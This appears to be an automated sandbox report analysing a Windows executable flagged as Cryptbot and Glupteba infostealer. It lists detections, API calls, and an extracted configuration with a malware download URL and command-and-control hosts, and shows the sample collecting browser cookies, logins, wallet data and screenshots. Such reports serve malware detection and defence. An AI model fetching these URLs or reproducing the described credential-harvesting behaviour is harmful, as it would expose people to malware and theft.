Loading ...

Play interactive tourEdit tour

Windows Analysis Report file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:501609
MD5:6738381ddd3d2952312af2a0f2be5157
SHA1:40fa53df583e9b598bb2d7be716958b1f5bad0dc
SHA256:84f4e2b346b6f5473e2c564a6f60985c5d20f621e70a982e9aafd21354ccc66f
Infos:

Most interesting Screenshot:

Detection

Cryptbot Glupteba
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Cryptbot
Detected unpacking (overwrites its own PE header)
Yara detected Glupteba
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file contains strange resources
Contains functionality to read the PEB
Contains functionality to download and launch executables
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5940 cmdline: 'C:\Users\user\Desktop\file.exe' MD5: 6738381DDD3D2952312AF2A0F2BE5157)
  • cleanup

Malware Configuration

Threatname: Cryptbot

{"Download URL": "http://bojwfi01.top/download.php?file=lv.exe", "C2 list": ["moresh01.top/index.php", "cemnit12.top/index.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.666994856.0000000003360000.00000004.00000001.sdmpJoeSecurity_CryptbotYara detected CryptbotJoe Security
    00000000.00000002.929802806.0000000001840000.00000040.00000001.sdmpJoeSecurity_CryptbotYara detected CryptbotJoe Security
      00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmpJoeSecurity_CryptbotYara detected CryptbotJoe Security
        Process Memory Space: file.exe PID: 5940JoeSecurity_Glupteba_1Yara detected GluptebaJoe Security
          Process Memory Space: file.exe PID: 5940JoeSecurity_CryptbotYara detected CryptbotJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.400000.0.unpackJoeSecurity_CryptbotYara detected CryptbotJoe Security
              0.2.file.exe.400000.0.raw.unpackJoeSecurity_CryptbotYara detected CryptbotJoe Security
                0.2.file.exe.1840e50.1.unpackJoeSecurity_CryptbotYara detected CryptbotJoe Security
                  0.3.file.exe.3360000.0.unpackJoeSecurity_CryptbotYara detected CryptbotJoe Security
                    0.2.file.exe.1840e50.1.raw.unpackJoeSecurity_CryptbotYara detected CryptbotJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.2.file.exe.1840e50.1.raw.unpackMalware Configuration Extractor: Cryptbot {"Download URL": "http://bojwfi01.top/download.php?file=lv.exe", "C2 list": ["moresh01.top/index.php", "cemnit12.top/index.php"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: file.exeReversingLabs: Detection: 60%
                      Antivirus detection for URL or domainShow sources
                      Source: http://bojwfi01.top/download.php?file=lv.exeAvira URL Cloud: Label: malware
                      Source: moresh01.top/index.phpAvira URL Cloud: Label: malware
                      Machine Learning detection for sampleShow sources
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401220 GetFileAttributesW,CreateFileW,GetFileSizeEx,CloseHandle,CreateFileMappingW,MapViewOfFile,CloseHandle,CloseHandle,CryptUnprotectData,LocalFree,UnmapViewOfFile,CloseHandle,FindCloseChangeNotification,CloseHandle,0_2_00401220

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
                      Source: file.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Binary string: C:\pubezepimog\teyakucarurab_vijuwatizuxi_33.pdb0E source: file.exe
                      Source: Binary string: C:\pubezepimog\teyakucarurab_vijuwatizuxi_33.pdb source: file.exe
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402680 Sleep,FindFirstFileW,FindNextFileW,FindClose,0_2_00402680
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042ABC1 FindFirstFileExW,0_2_0042ABC1
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnMJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_FilesJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: moresh01.top/index.php
                      Source: Malware configuration extractorURLs: cemnit12.top/index.php
                      Source: unknownDNS traffic detected: query: cemnit12.top replaycode: Server failure (2)
                      Source: file.exe, file.exe, 00000000.00000003.666994856.0000000003360000.00000004.00000001.sdmpString found in binary or memory: http://bojwfi01.top/download.php?file=lv.exe
                      Source: file.exe, 00000000.00000002.930560853.0000000003F08000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/in-k
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.php
                      Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.php#
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.php#An
                      Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.php&
                      Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.php0
                      Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.php7
                      Source: file.exe, 00000000.00000002.929909251.00000000019FC000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.php?J
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpB
                      Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpF
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpFB
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpMB
                      Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpP
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpPB
                      Source: file.exe, 00000000.00000002.930535454.0000000003ED8000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpQ
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpWB
                      Source: file.exe, 00000000.00000002.930014729.0000000001A7C000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpX
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpZB
                      Source: file.exe, 00000000.00000002.930014729.0000000001A7C000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpb
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpe
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpeB
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phphB
                      Source: file.exe, 00000000.00000002.929909251.00000000019FC000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpl
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpoB
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phprB
                      Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpString found in binary or memory: http://cemnit12.top/index.phpyB
                      Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownDNS traffic detected: queries for: cemnit12.top
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DB70 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,0_2_0040DB70
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040AD20 RegQueryValueExW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,GdiplusShutdown,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,CopyFileW,0_2_0040AD20
                      Source: file.exe, 00000000.00000002.929870758.00000000019C8000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: file.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004140000_2_00414000
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B72F0_2_0041B72F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138F00_2_004138F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043030F0_2_0043030F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004223F00_2_004223F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004204290_2_00420429
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043042F0_2_0043042F
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B4FD0_2_0041B4FD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004135800_2_00413580
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004327BD0_2_004327BD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004338000_2_00433800
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B9940_2_0041B994
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411A100_2_00411A10
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042DAF10_2_0042DAF1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410E500_2_00410E50
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044EA800_2_0044EA80
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040F2F0 appears 57 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00416C70 appears 50 times
                      Source: file.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: file.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: file.exeReversingLabs: Detection: 60%
                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\andianJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\htRscvJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/13@73/0
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: \_Files0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: \_Files\_Files0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: \_Files\_Wallet0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: \_Files\_Chrome0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: \_Files\_Opera0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: \_Files\_Brave0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: \files_0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: \files_\files0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: \files_\_Chrome0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: \files_\_Opera0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: \files_\_Brave0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: %Temp%\0_2_00415BF0
                      Source: C:\Users\user\Desktop\file.exeCommand line argument: >.C0_2_00432D90
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\pubezepimog\teyakucarurab_vijuwatizuxi_33.pdb0E source: file.exe
                      Source: Binary string: C:\pubezepimog\teyakucarurab_vijuwatizuxi_33.pdb source: file.exe

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043668D push esi; ret 0_2_00436696
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408A6A push 48680000h; ret 0_2_00408A77
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416CB6 push ecx; ret 0_2_00416CC9
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_019DB1DD pushad ; iretd 0_2_019DB1DE
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.34053606656
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DB70 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,0_2_0040DB70
                      Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\file.exeRegistry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A6E3 GetFileAttributesW,GetFileAttributesW,GetSystemInfo,KiUserCallbackDispatcher,GlobalMemoryStatusEx,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,0_2_0040A6E3
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402680 Sleep,FindFirstFileW,FindNextFileW,FindClose,0_2_00402680
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042ABC1 FindFirstFileExW,0_2_0042ABC1
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnMJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_FilesJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                      Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllbn;G
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041D1DD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041D1DD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042C070 GetProcessHeap,0_2_0042C070
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004230B1 mov eax, dword ptr fs:[00000030h]0_2_004230B1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042A824 mov eax, dword ptr fs:[00000030h]0_2_0042A824
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041D1DD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041D1DD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416A61 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00416A61
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416BF7 SetUnhandledExceptionFilter,0_2_00416BF7
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416E3D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00416E3D
                      Source: file.exe, 00000000.00000002.930113974.0000000001F50000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: file.exe, 00000000.00000002.930113974.0000000001F50000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: file.exe, 00000000.00000002.930113974.0000000001F50000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: file.exe, 00000000.00000002.930113974.0000000001F50000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_cookies.db VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_key.bin VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_logins.db VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_webdata.db VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Information.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Screen_Desktop.jpeg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,0_2_0040DB70
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416891 cpuid 0_2_00416891
                      Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413A40 SetFilePointer,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00413A40
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00429D74 _free,_free,_free,GetTimeZoneInformation,_free,0_2_00429D74
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040AA30 GetFileAttributesW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegCloseKey,RegOpenKeyExW,RegCloseKey,GetUserNameW,ExpandEnvironmentStringsW,CreateDirectoryW,Sleep,0_2_0040AA30

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected CryptbotShow sources
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.1840e50.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.3360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.1840e50.1.raw.unpack, type: UNPACKEDPE
